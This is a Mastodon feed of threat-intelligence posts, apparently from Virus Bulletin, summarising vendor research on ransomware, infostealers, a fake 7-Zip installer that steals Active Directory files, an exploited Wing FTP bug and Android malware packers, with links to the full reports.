Mastodawn

Acronis TRU researchers look into the SafePay ransomware group targeting managed service providers & small-to-midsize businesses across industries. The group appears to operate with centralized control, managing its own operations, infrastructure & negotiations. https://www.acronis.com/en-us/tru/posts/safepay-ransomware-the-fast-rising-threat-targeting-msps/

Virus Bulletin 1d ago

SentinelOne's Phil Stokes (‪@philofishal) & Dinesh Devadoss provide a technical analysis of the latest version of the macOS.ZuRu malware, along with new technical indicators to aid detection engineers and threat hunters. https://www.sentinelone.com/blog/macos-zuru-resurfaces-modified-khepri-c2-hides-inside-doctored-termius-app/

Virus Bulletin 1d ago

Huntress's John Hammond, Jamie Levy, Lindsey O'Donnell-Welch & Michael Tigges observed exploitation of a remote code execution Wing FTP Server bug (CVE-2025-47812). Organizations running Wing FTP Server should update to the fixed version. https://www.huntress.com/blog/wing-ftp-server-remote-code-execution-cve-2025-47812-exploited-in-wild

Virus Bulletin 1d ago

ESET Research 3d ago

After years of dominance in #ESET’s top #infostealer statistics, the era of #AgentTesla has come to an end. It finished H1 2025 in fourth place, its numbers having decreased by 57%. The reason? It is no longer under active development.
The threat actors behind Agent Tesla have reportedly lost access to the servers with the malware’s source code. A successor appeared almost immediately – another #MaaS threat, known as #SnakeStealer or #SnakeKeylogger, has claimed the number one spot.
Recommended as a suitable replacement directly in Agent Tesla’s Telegram channel, SnakeStealer now takes up almost a fifth of all infostealer detections registered by ESET telemetry. Between H2 2024 and H1 2025, its detections more than doubled.
If you want to find out more information about this changing of the guard in the infostealer threat landscape, head on over to #ESETThreatReport: https://welivesecurity.com/en/eset-research/eset-threat-report-h1-2025

Virus Bulletin 2d ago

ANY.RUN 3d ago

🚨 Fake 7-Zip installer exfiltrates Active Directory files.
A #malicious installer disguised as 7-Zip steals critical Active Directory files, including ntds.dit and the SYSTEM hive, by leveraging shadow copies and exfiltrating the data to a remote server.
🥷 Upon execution, the #malware creates a shadow copy of the system drive to bypass file locks and extract protected files without disrupting system operations.

🎯 It then copies ntds.dit, which contains Active Directory user and group data, and SYSTEM, which holds the corresponding encryption keys.

The malware connects to a remote server via SMB using hardcoded credentials. All output is redirected to NUL to minimize traces.

👨‍💻 #ANYRUN Sandbox makes it easy to detect these stealthy operations by providing full behavioral visibility, from network exfiltration to credential staging, within a single interactive session.
🔍 See analysis session: https://app.any.run/tasks/7f03cd5b-ad02-4b3a-871f-c31ac0f5dc15/?utm_source=mastodon&utm_medium=post&utm_campaign=fake_7zip&utm_term=090725&utm_content=linktoservice

This technique grants the attacker full access to ntds.dit dump, allowing them to extract credentials for Active Directory objects and enables lateral movement techniques such as Pass-the-Hash or Golden Ticket.

🚀 Analyze and investigate the latest malware and #phishing threats with #ANYRUN.
#ExploreWithANYRUN

Virus Bulletin 3d ago

How does Russia’s Sandworm unit exploit pirated software to target Ukraine?

Join Arda Buyukkaya from EclecticIQ at VB2025 in Berlin to uncover how cyber operations can turn everyday behaviour into large-scale threats.

📅 Sept 25 | 09:30–10:00 | Green Room

Find out more about this talk 👉 https://tinyurl.com/e9anehex

#VB2025 #cybersecurity #conference #networking

Virus Bulletin 3d ago

Palo Alto Networks Unit 42 researchers uncovered a campaign by an initial access broker to exploit leaked Machine Keys (cryptographic keys used on ASP.NET sites) to gain access to targeted organizations & sell that access on to other threat actors. https://unit42.paloaltonetworks.com/initial-access-broker-exploits-leaked-machine-keys/

Virus Bulletin 3d ago

Trellix researchers discovered a DoNot APT (aka APT-C-35, Mint Tempest, Origami Elephant, SECTOR02 & Viceroy Tiger) campaign targeting a European foreign affairs ministry. The attackers lured their targets to click on a malicious Google Drive link. https://www.trellix.com/blogs/research/from-click-to-compromise-unveiling-the-sophisticated-attack-of-donot-apt-group-on-southern-european-government-entities/

Virus Bulletin 3d ago

Morphisec’s threat research team has uncovered the revival of Pay2Key, an Iranian-backed ransomware-as-a-service operation. Researcher Ilia Kulmin presents a technical analysis and OSINT findings, exposing Pay2Key.I2P’s operations and its ties to Mimic. https://www.morphisec.com/blog/pay2key-resurgence-iranian-cyber-warfare/

Pay2Key’s Resurgence: Iranian Cyber Warfare Targets the West

Pay2Key's recent resurgence is driven by Iranian cyber warfare and targeting western countries. Read the full technical analysis and details.

Morphisec

Virus Bulletin 3d ago

ANY.RUN 4d ago

👾 #Ducex is a packer used by #Triada trojan. It stands out due to:
🔹 Native code
🔹 Encrypted functions & strings
🔹 Self-debugging
🔹 Signature checks
🔹 Frida & Xposed detection

👨‍💻 Read our technical analysis to see how it works: https://any.run/cybersecurity-blog/ducex-packer-analysis/?utm_source=mastodon&utm_medium=post&utm_campaign=ducex_analysis&utm_term=080725&utm_content=linktoblog

Technical Analysis of Ducex: Packer of Triada Android Malware

Read a technical analysis of the Ducex packer used by Android malware like Triada for obfuscation and analysis evasion.

ANY.RUN's Cybersecurity Blog